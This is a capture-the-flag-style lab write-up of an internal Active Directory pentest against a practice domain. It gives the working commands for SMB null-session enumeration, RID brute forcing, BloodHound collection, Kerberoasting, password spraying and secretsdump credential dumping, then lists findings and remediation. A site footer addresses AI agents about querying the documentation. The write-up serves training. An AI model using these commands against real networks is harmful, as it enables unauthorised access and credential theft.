# MartiniAD (Easy)

<figure><img src="/files/Y0MahDttMSafJVGpE0lW" alt=""><figcaption></figcaption></figure>

### Objective <a href="#user-content-objective" id="user-content-objective"></a>

An adult beverage company "Martini Bars" recently had a corporate breach and the compliance and risk team dictates they perform a penetration test at one of their branch offices. The Hack Smarter team has been authorized to perform an internal black box pentest.

#### Initial Access <a href="#user-content-initial-access" id="user-content-initial-access"></a>

The client has provided you with VPN access to their internal network, but no credentials.

### Scanning & Enumeration

```
nmap -p- --min-rate 1000 10.1.137.111
```

```
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
3389/tcp  open  ms-wbt-server
5985/tcp  open  wsman
9389/tcp  open  adws
```

### SMB Null Session Discovery

```
nxc smb 10.1.137.111 -u l1nuxkid -p '' --shares
```

<figure><img src="/files/xXDdWlWqgnNjLi8Vy8v1" alt=""><figcaption></figcaption></figure>

* Read access over `IPC$` (default share)
* **Critical finding:** Write access over a non-default share named `notes`

Navigating the `notes` share revealed a `notes.txt` file containing credentials for user `mprice`.

<figure><img src="/files/6coPwAXdRUYJUP9DbUgt" alt=""><figcaption></figcaption></figure>

#### User Enumeration via RID Brute

```
nxc smb 10.1.137.111 -u 'l1nuxkid' -p '' --rid-brute | grep -iv SidTypeGroup | awk '{print $6}' | cut -d '\' -f 2
```

<figure><img src="/files/UajSCjYQWrIkiEtmPD0A" alt=""><figcaption></figcaption></figure>

* Initial password spraying attempts using discovered usernames were unsuccessful.

### Bloodhound Collection Failed

Standard BloodHound collection via nxc and bloodhound-python encountered issues, but alternative methods were successful.

```
nxc ldap 10.1.137.111 -u m.price -p '*martini*'  --bloodhound --collection all --dns-server 10.1.137.111
```

```
bloodhound-python -u m.price -p '*martini*' -ns 10.1.137.111 -c all -d DRY.MARTINI.BARS --zip
```

<figure><img src="/files/w8LXPWvcqMBlybQ3bPHJ" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/f6XWtZz90SE9FXu8Uuwj" alt=""><figcaption></figcaption></figure>

Using Bloody-ad:

```
bloodyAD --host 10.1.137.111 -d DRY.MARTINI.BARS -u mprice -p '*martini*' get writable --detail
```

### Kerberoasting Attack

* Identifying Kerberoastable Accounts

```
 bloodyAD --host 10.1.137.111 -d DRY.MARTINI.BARS -u mprice -p '*martini*' get search --filter '(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*))' --attr sAMAccountName,servicePrincipalName
```

<figure><img src="/files/hbGp8CsWdWJz5wB1rKZF" alt=""><figcaption></figcaption></figure>

```
GetUserSPNs.py -request -dc-ip 10.1.137.111 DRY.MARTINI.BARS/mprice:'*martini*' -outputfile kerb_hash.txt
```

<figure><img src="/files/AQaxZJulCOiSe299cNwX" alt=""><figcaption></figcaption></figure>

### Shell as athena\_t0

```
nxc rdp 10.1.137.111 -u athena_svc -p 1dirtymartini
```

<figure><img src="/files/08YM1VgYBdzrSY2s2X51" alt=""><figcaption></figcaption></figure>

```
xfreerdp3  /v:10.1.137.111 /u:athena_svc  /p:'1dirtymartini' +clipboard
```

<figure><img src="/files/RLLsa0gYcyOXf3IYY9ar" alt=""><figcaption></figcaption></figure>

OOPS can't login. Now let's do password spray

```
nxc rdp 10.1.137.111 -u usernames -p 1dirtymartini
```

<figure><img src="/files/ETwXxn1IqAMoaGFfs9eH" alt=""><figcaption></figcaption></figure>

**Success:** Credentials worked for user `athena.t0`.

t0 = tier 0 (probably more privilege user)

RDP:

```
xfreerdp3  /v:10.1.137.111 /u:athena.t0  /p:'1dirtymartini' +clipboard
whoami /priv
```

<figure><img src="/files/ebs77N8BOCy0a93C8eS5" alt=""><figcaption></figcaption></figure>

**Finding:** User `athena.t0` has elevated admin privileges on the system.

```
nxc smb 10.1.137.111 -u athena.t0  -p 1dirtymartini --sam
```

```
secretsdump.py 'athena.t0:1dirtymartini@10.1.137.111'
```

<figure><img src="/files/qMIGt6rKxZnfFxefcU9d" alt=""><figcaption></figcaption></figure>

#### Critical Issues Identified

1. **SMB Null Session Enabled** - Anonymous access allowed
2. **Plaintext Credentials in Network Share** - Sensitive data exposure
3. **Kerberoastable Service Account** - Weak password policy for service accounts
4. **Password Reuse** - Same password across multiple accounts
5. **Privileged RDP Access** - Standard users granted excessive privileges

#### Remediation Steps

* Disable SMB null session access
* Remove plaintext credentials from file shares
* Implement Managed Service Accounts (gMSA) for services
* Enforce strong password policy (minimum 25+ characters for service accounts)
* Review and restrict RDP and local privilege assignments
* Implement regular password rotation for service accounts


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://l1nuxkid.gitbook.io/l1nuxkid-docs/hacksmarter-labs/martiniad-easy.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.